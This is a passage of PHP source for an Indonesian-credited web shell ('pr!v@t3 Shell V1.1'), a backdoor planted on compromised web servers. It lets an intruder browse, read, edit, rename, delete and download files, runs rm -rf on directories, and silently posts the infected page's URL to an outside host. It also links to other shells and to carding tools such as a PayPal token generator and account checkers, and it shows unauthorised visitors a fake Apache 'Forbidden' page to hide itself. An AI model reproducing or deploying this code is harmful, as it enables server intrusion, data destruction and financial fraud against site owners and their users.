3573</textarea><br>
3574</center>';
3575}
3576if($_GET['x']=="d"){
3577 shc::drop();
3578}
3579echo '
3580<script type="text/javascript">
3581$(document).ready(function(){
3582 $.post("http://shor7cut.today/ip.php",
3583 {patch: document.URL},
3584 function(data,status){
3585 });
3586});
3587</script>';
3588}elseif($_GET['do'] == 'tentang'){
3589 echo "<center>";
3590 echo '<pre>';
3591 echo "<h2>pr!v@t3 Shell V1.1 / N45HT Shell v1.1</h2>";
3592 echo "<p>Shell ini adalah hasil recode dari Shell Extreme Crew</p>";
3593 echo "<p>Dalam v1.1, juga ditambahkan beberapa Fungsi Exploit. Silahkan di check sendiri</p>";
3594 echo "<p>Terima kasih buat <strong>Extreme Crew - IndoXploit - K2LL33D - Mr.P-teo</strong> yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya";
3595 echo "<p>Jika Anda mempunyai tools (Web Based Only) ingin di 'open sourcekan', bisa kirim melalui email : palsufake1@gmail.com</p>";
3596 echo "<p>Let's Play With this Web Shell ^_^</p>";
3597 echo "<p>Big Thanks For : </p>";
3598 echo "<p>[! Extreme Crew - IndoXploit - K2LL33D - Mr.P-teo - N45HT - iTeens - Defacer Tersakiti Team - BackBox Team !]</p>";
3599} elseif($_GET['act'] == 'newfile') {
3600 if($_POST['new_save_file']) {
3601 $newfile = htmlspecialchars($_POST['newfile']);
3602 $fopen = fopen($newfile, "a+");
3603 if($fopen) {
3604 $act = "<script>window.location='?bom&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
3605 } else {
3606 $act = "<font color=red>permission denied</font>";
3607 }
3608 }
3609 echo $act;
3610 echo "<form method='post'>
3611 Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
3612 <input type='submit' name='new_save_file' value='Submit'>
3613 </form>";
3614} elseif($_GET['act'] == 'newfolder') {
3615 if($_POST['new_save_folder']) {
3616 $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
3617 if(!mkdir($new_folder)) {
3618 $act = "<font color=red>permission denied</font>";
3619 } else {
3620 $act = "<script>window.location='?bom&folder=".$dir."';</script>";
3621 }
3622 }
3623 echo $act;
3624 echo "<form method='post'>
3625 Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
3626 <input type='submit' name='new_save_folder' value='Submit'>
3627 </form>";
3628} elseif($_GET['act'] == 'rename_dir') {
3629 if($_POST['dir_rename']) {
3630 $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
3631 if($dir_rename) {
3632 $act = "<script>window.location='?bom&folder=".dirname($dir)."';</script>";
3633 } else {
3634 $act = "<font color=red>permission denied</font>";
3635 }
3636 echo "".$act."<br>";
3637 }
3638 echo "<form method='post'>
3639 <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
3640 <input type='submit' name='dir_rename' value='rename'>
3641 </form>";
3642} elseif($_GET['act'] == 'delete_dir') {
3643 if(is_dir($dir)) {
3644 if(is_writable($dir)) {
3645 @rmdir($dir);
3646 @exe("rm -rf $dir");
3647 @exe("rmdir /s /q $dir");
3648 $act = "<script>window.location='?bom&folder=".dirname($dir)."';</script>";
3649 } else {
3650 $act = "<font color=red>could not remove ".basename($dir)."</font>";
3651 }
3652 }
3653 echo $act;
3654} elseif($_GET['act'] == 'view') {
3655 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3656 echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
3657} elseif($_GET['act'] == 'edit') {
3658 if($_POST['save']) {
3659 $save = file_put_contents($_GET['file'], $_POST['src']);
3660 if($save) {
3661 $act = "<font color=lime>Saved!</font>";
3662 } else {
3663 $act = "<font color=red>permission denied</font>";
3664 }
3665 echo "".$act."<br>";
3666 }
3667 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3668 echo "<form method='post'>
3669 <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
3670 <input type='submit' value='Save' name='save' style='width: 500px;'>
3671 </form>";
3672} elseif($_GET['act'] == 'rename') {
3673 if($_POST['do_rename']) {
3674 $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
3675 if($rename) {
3676 $act = "<script>window.location='?bom&folder=".$dir."';</script>";
3677 } else {
3678 $act = "<font color=red>permission denied</font>";
3679 }
3680 echo "".$act."<br>";
3681 }
3682 echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
3683 echo "<form method='post'>
3684 <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
3685 <input type='submit' name='do_rename' value='rename'>
3686 </form>";
3687} elseif($_GET['act'] == 'delete') {
3688 $delete = unlink($_GET['file']);
3689 if($delete) {
3690 $act = "<script>window.location='?bom&folder=".$dir."';</script>";
3691 } else {
3692 $act = "<font color=red>permission denied</font>";
3693 }
3694 echo $act;
3695} else {
3696 if(is_dir($dir) === true) {
3697 if(!is_readable($dir)) {
3698 echo "<font color=red>can't open directory. ( not readable )</font>";
3699 } else {
3700 echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
3701 <tr>
3702 <th class="th_home"><center>Name</center></th>
3703 <th class="th_home"><center>Type</center></th>
3704 <th class="th_home"><center>Size</center></th>
3705 <th class="th_home"><center>Last Modified</center></th>
3706 <th class="th_home"><center>Owner/Group</center></th>
3707 <th class="th_home"><center>Permission</center></th>
3708 <th class="th_home"><center>Action</center></th>
3709 </tr>';
3710 $scandir = scandir($dir);
3711 foreach($scandir as $dirx) {
3712 $dtype = filetype("$dir/$dirx");
3713 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
3714 if(function_exists('posix_getpwuid')) {
3715 $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
3716 $downer = $downer['name'];
3717 } else {
3718 //$downer = $uid;
3719 $downer = fileowner("$dir/$dirx");
3720 }
3721 if(function_exists('posix_getgrgid')) {
3722 $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
3723 $dgrp = $dgrp['name'];
3724 } else {
3725 $dgrp = filegroup("$dir/$dirx");
3726 }
3727 if(!is_dir("$dir/$dirx")) continue;
3728 if($dirx === '..') {
3729 $href = "<a href='?bom&folder=".dirname($dir)."'>$dirx</a>";
3730 } elseif($dirx === '.') {
3731 $href = "<a href='?bom&folder=$dir'>$dirx</a>";
3732 } else {
3733 $href = "<a href='?bom&folder=$dir/$dirx'>$dirx</a>";
3734 }
3735 if($dirx === '.' || $dirx === '..') {
3736 $act_dir = "<a href='?bom&act=newfile&folder=$dir'>newfile</a> | <a href='?bom&act=newfolder&folder=$dir'>newfolder</a>";
3737 } else {
3738 $act_dir = "<a href='?bom&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?bom&act=delete_dir&folder=$dir/$dirx'>delete</a>";
3739 }
3740 echo "<tr>";
3741 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
3742 echo "<td class='td_home'><center>$dtype</center></td>";
3743 echo "<td class='td_home'><center>-</center></th></td>";
3744 echo "<td class='td_home'><center>$dtime</center></td>";
3745 echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
3746 echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
3747 echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
3748 echo "</tr>";
3749 }
3750 }
3751 } else {
3752 echo "<font color=red>can't open directory.</font>";
3753 }
3754 foreach($scandir as $file) {
3755 $ftype = filetype("$dir/$file");
3756 $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
3757 $size = filesize("$dir/$file")/1024;
3758 $size = round($size,3);
3759 if(function_exists('posix_getpwuid')) {
3760 $fowner = @posix_getpwuid(fileowner("$dir/$file"));
3761 $fowner = $fowner['name'];
3762 } else {
3763 //$downer = $uid;
3764 $fowner = fileowner("$dir/$file");
3765 }
3766 if(function_exists('posix_getgrgid')) {
3767 $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
3768 $fgrp = $fgrp['name'];
3769 } else {
3770 $fgrp = filegroup("$dir/$file");
3771 }
3772 if($size > 1024) {
3773 $size = round($size/1024,2). 'MB';
3774 } else {
3775 $size = $size. 'KB';
3776 }
3777 if(!is_file("$dir/$file")) continue;
3778 echo "<tr>";
3779 echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?bom&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
3780 echo "<td class='td_home'><center>$ftype</center></td>";
3781 echo "<td class='td_home'><center>$size</center></td>";
3782 echo "<td class='td_home'><center>$ftime</center></td>";
3783 echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
3784 echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
3785 echo "<td class='td_home' style='padding-left: 15px;'><a href='?bom&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?bom&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?bom&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?bom&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
3786 echo "</tr>";
3787 }
3788 echo "</table>";
3789 if(!is_readable($dir)) {
3790 //
3791 } else {
3792 echo "<hr>";
3793 }
3794 echo "<center><form>
3795<select onchange='if (this.value) window.open(this.value);'>
3796 <option selected='selected' value=''> Tools Creator </option>
3797 <option value='$ling=wso'>WSO 2.8.1</option>
3798 <option value='$ling=injection'>1n73ction v3</option>
3799 <option value='$ling=wk'>WHMCS Killer</option>
3800 <option value='$ling=adminer'>Adminer</option>
3801 <option value='$ling=b374k'>b374k Shell</option>
3802 <option value='$ling=b374k323'>b374k 3.2</option>
3803 <option value='$ling=bh'>BlackHat Shell</option>
3804 <option value='$ling=dhanus'>Dhanush Shell</option>
3805 <option value='$ling=r57'>R57 Shell</option>
3806<option value='$ling=encodedecode'>Encode Decode</option>
3807<option value='$ling=r57'>R57 Shell</option>
3808</select>
3809<select onchange='if (this.value) window.open(this.value);'>
3810 <option selected='selected' value=''> Tools Carder </option>
3811 <option value='$ling=extractor'>DB Email Extractor</option>
3812 <option value='$ling=promailerv2'>Pro Mailer V2</option>
3813 <option value='$ling=bukalapak'>BukaLapak Checker</option>
3814 <option value='$ling=tokopedia'>TokoPedia Checker</option>
3815 <option value='$ling=tokenpp'>Paypal Token Generator</option>
3816 <option value='$ling=mailer'>Mailer</option>
3817 <option value='$ling=gamestopceker'>GamesTop Checker</option>
3818 </select>
3819<noscript><input type='submit' value='Submit'></noscript>
3820</form>";
3821 echo "<center>Copyright © ".date("Y")." - <a href='?bom&folder=$dir&do=tentang'>pr!v@t3</a></center>";
3822}
3823echo "</html>";
3824}
3825else
3826{
3827echo "<h1>Forbidden</h1><p>You dont't have permission to access ".$dir." on this server.</p><hr>
3828<address>Apache Server at ".gethostbyname($_SERVER['HTTP_HOST'])." Port 80</address></body></html>";
3829return false;
3830}
3831?>